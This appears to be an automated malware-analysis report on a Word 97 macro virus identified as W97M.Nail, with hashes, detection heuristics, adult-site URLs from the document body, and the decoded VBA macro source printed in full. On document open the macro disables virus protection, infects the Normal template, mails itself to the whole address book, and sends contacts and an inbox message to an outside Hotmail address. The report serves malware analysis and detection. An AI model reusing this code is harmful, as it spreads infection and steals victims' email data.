Office (OLE) malware analysis — malicious · 4719b24a5f762949

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-04-01 14:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 549b0227f616cd5f9ac814924d6df41a SHA-1: 8a96569bc2af2e4b080cb73352d0e018eeadf922 SHA-256: 4719b24a5f7629496c97f234c04050febef5b144edbb540b2e9f365e3f8a2e0a

202 Risk Score

Heuristics 6

ClamAV: Doc.Trojan.Nail-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Nail-3
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.cyberclub.com/ignite/members In document text (OLE body)
- http://hotbox.danni.com/hotbox/In document text (OLE body)
- http://www.powerflow.com/members/135798642.htmlIn document text (OLE body)
- http://www.allasians1.com/membersonly/gallery/In document text (OLE body)
- http://www.breathlessbabes.com/protectedIn document text (OLE body)
- http://www.caughtceleb.com/cmlogin.htmlIn document text (OLE body)
- http://www.pornmountain.com/membersIn document text (OLE body)
- http://www.sexillustrated.com/1stquarter/members2.htmIn document text (OLE body)
- http://www.redlight.com/membersIn document text (OLE body)
- http://www.freeamsterdamsex.com/membersIn document text (OLE body)
- http://www.sourceofkaos.com/homes/1nternalIn document text (OLE body)
- http://www.itouchmyself.com/members/index.htmlIn document text (OLE body)
- http://www.dixiecam.com/members/In document text (OLE body)
- http://www.itsreal.com/membersIn document text (OLE body)
- http://www.111sexstreet.com/private/sex02.htmlIn document text (OLE body)
- http://teenlabs.com/reactor/reactor1.htmIn document text (OLE body)
- http://www.sweet18.com/home.htmlIn document text (OLE body)
- http://members.campusbabes.com/In document text (OLE body)
- http://www.sextv.com/members/index.htmlIn document text (OLE body)
- http://www.smutheaven.com/m/members.htmlIn document text (OLE body)
- http://www.creamythighs.com/members/In document text (OLE body)
- http://www.celebrity-hardcore.com/members/index.htmlIn document text (OLE body)
- http://www.dirtyonline.com/membersonly/In document text (OLE body)
- http://www.sexpaige.com/members/mem_home.htmlIn document text (OLE body)
- http://members.sexy-photos.comIn document text (OLE body)
- http://www.cybersex.com/members/index.htmlIn document text (OLE body)
- http://members2.5starerotica.com/index.htmlIn document text (OLE body)
- http://www.virtualhardcore.com/pictures/index.htmlIn document text (OLE body)
- http://www.sexxx-drive.com/members/index.htmlIn document text (OLE body)
- http://www.sizzle.com/members/index.shtmlIn document text (OLE body)
- http://www.lesbiansonly.com/members.htmIn document text (OLE body)
- http://members.maturewomen.com/In document text (OLE body)
- http://www.sexualeuphoria.com/members/archives/index.htmlIn document text (OLE body)
- http://www.pureteens.com/membersIn document text (OLE body)
- http://www.extremeadultsex.com/membersIn document text (OLE body)
- http://www.sexroom.net/members/In document text (OLE body)
- http://amazingonline.com/membersdox/In document text (OLE body)
- http://www.venusonline.com/tricia/Members/index.htmIn document text (OLE body)
- http://www.chickflicks.com/m/members.htmlIn document text (OLE body)
- http://www.valuesex.com/valuesexmembers/main.htmlIn document text (OLE body)
- http://www.xxxensation.com/cgi-sec/xxxloginIn document text (OLE body)
- http://www.kingporno.com/authorized/In document text (OLE body)
- http://www.erotic-express.com/member/eng/In document text (OLE body)
- http://www.sexualeuphoria.com/members/index.htmlIn document text (OLE body)
- http://members.celebs-n-models.net/babes/In document text (OLE body)
- http://www.erosnet.com/home.htmlIn document text (OLE body)
- http://www.manhole.com/members/index.htmlIn document text (OLE body)
- http://www.cyberstrip.com/members/html/members.cfmIn document text (OLE body)
- http://www.corinadine.com/members/index.htmlIn document text (OLE body)
- http://www.Shockingpink.com/members/tina1.htmlIn document text (OLE body)
+21 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9155 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9155 bytes
SHA-256: `a07a65c7df1c496800cd020db2979b263d0bfade69c2bc43aa330bad0e473045`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True '<!--1nternal--> 'W97M.Nail/ACM (20/03/99) Variant v0.2 Private Sub Document_Open() On Error Resume Next Randomize Options.SaveNormalPrompt = False Options.ConfirmConversions = False Options.VirusProtection = False Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule If NT.Lines(1, 1) <> "'<!--1nternal-->" Then If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office", "Melissa?") <> "" Then MsgBox ("W97M.Nail variant detected...") GInfo = "ES: " End If NT.DeleteLines 1, NT.CountOfLines NT.InsertLines 1, AD.Lines(1, AD.CountOfLines) Set MAPISess = CreateObject("MAPI.Session") MAPISess.Logon SubjectLines = Array("", MAPISess.CurrentUser, "Who's your Daddy?", "I've finished it!") ContentLines = Array("", "I thought you should know about this recent development...", "The media distort everything...", "You would probably find this interesting...") MesNum = Int(Rnd * 4) CRLF = Chr(13) + Chr(10) MesContent = CRLF + ContentLines(MesNum) + CRLF + CRLF + MAPISess.CurrentUser Set ChainMes = MAPISess.Outbox.Messages.Add(SubjectLines(MesNum), MesContent) Set objRecipients = ChainMes.Recipients For Each AdrEntry In MAPISess.AddressLists(1).AddressEntries Set Recp = objRecipients.Add(Name:=AdrEntry.Address, Type:=3) GInfo = GInfo + AdrEntry.Address + ";" Next Set objAttach = ChainMes.Attachments.Add objAttach.Type = 1 objAttach.Source = ActiveDocument.FullName objAttach.Position = 0 objAttach.Name = MAPISess.CurrentUser GInfo = GInfo + CRLF + CRLF + MAPISess.Inbox.Messages(Int(Rnd * MAPISess.Inbox.Messages.Count) + 1).Text + CRLF GInfo = GInfo + "W97M.Nail II" Set Retr = MAPISess.Outbox.Messages.Add(MAPISess.CurrentUser, GInfo) Set Recp = Retr.Recipients.Add(Name:="chainnail@hotmail.com") Retr.Send ChainMes.Send MAPISess.Logoff End If If AD.Lines(1, 1) <> "'<!--1nternal-->" Then AD.DeleteLines 1, AD.CountOfLines AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) End If End Sub Private Sub Document_New() Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule If AD.Lines(1, 1) <> "'<!--1nternal-->" Then AD.DeleteLines 1, AD.CountOfLines AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) End If End Sub ' Processing file: /opt/analyzer/scan_staging/92b0d3c206ad4a8b8fb99283bf4624ed.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 4714 bytes ' Line #0: ' QuoteRem 0x0000 0x000F "<!--1nternal-->" ' Line #1: ' QuoteRem 0x0000 0x0025 "W97M.Nail/ACM (20/03/99) Variant v0.2" ' Line #2: ' FuncDefn (Private Sub Document_Open()) ' Line #3: ' OnError (Resume Next) ' Line #4: ' ArgsCall Read 0x0000 ' Line #5: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #6: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #7: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #8: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set NT ' Line #9: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set AD ' Line #10: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NT ' ... (truncated)

SHA-256: a07a65c7df1c496800cd020db2979b263d0bfade69c2bc43aa330bad0e473045

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<!--1nternal-->
'W97M.Nail/ACM (20/03/99) Variant v0.2
Private Sub Document_Open()
    On Error Resume Next
    Randomize
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office", "Melissa?") <> "" Then
            MsgBox ("W97M.Nail variant detected...")
            GInfo = "ES: "
        End If
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        Set MAPISess = CreateObject("MAPI.Session")
        MAPISess.Logon
            SubjectLines = Array("", MAPISess.CurrentUser, "Who's your Daddy?", "I've finished it!")
            ContentLines = Array("", "I thought you should know about this recent development...", "The media distort everything...", "You would probably find this interesting...")
            MesNum = Int(Rnd * 4)
            CRLF = Chr(13) + Chr(10)
            MesContent = CRLF + ContentLines(MesNum) + CRLF + CRLF + MAPISess.CurrentUser
            Set ChainMes = MAPISess.Outbox.Messages.Add(SubjectLines(MesNum), MesContent)
            Set objRecipients = ChainMes.Recipients
            For Each AdrEntry In MAPISess.AddressLists(1).AddressEntries
                Set Recp = objRecipients.Add(Name:=AdrEntry.Address, Type:=3)
                GInfo = GInfo + AdrEntry.Address + ";"
            Next
            Set objAttach = ChainMes.Attachments.Add
            objAttach.Type = 1
            objAttach.Source = ActiveDocument.FullName
            objAttach.Position = 0
            objAttach.Name = MAPISess.CurrentUser
            GInfo = GInfo + CRLF + CRLF + MAPISess.Inbox.Messages(Int(Rnd * MAPISess.Inbox.Messages.Count) + 1).Text + CRLF
            GInfo = GInfo + "W97M.Nail II"
            Set Retr = MAPISess.Outbox.Messages.Add(MAPISess.CurrentUser, GInfo)
            Set Recp = Retr.Recipients.Add(Name:="chainnail@hotmail.com")
            Retr.Send
            ChainMes.Send
        MAPISess.Logoff
    End If
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
End Sub
Private Sub Document_New()
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
End Sub

' Processing file: /opt/analyzer/scan_staging/92b0d3c206ad4a8b8fb99283bf4624ed.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4714 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000F "<!--1nternal-->"
' Line #1:
' 	QuoteRem 0x0000 0x0025 "W97M.Nail/ACM (20/03/99) Variant v0.2"
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	ArgsCall Read 0x0000 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #8:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #10:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.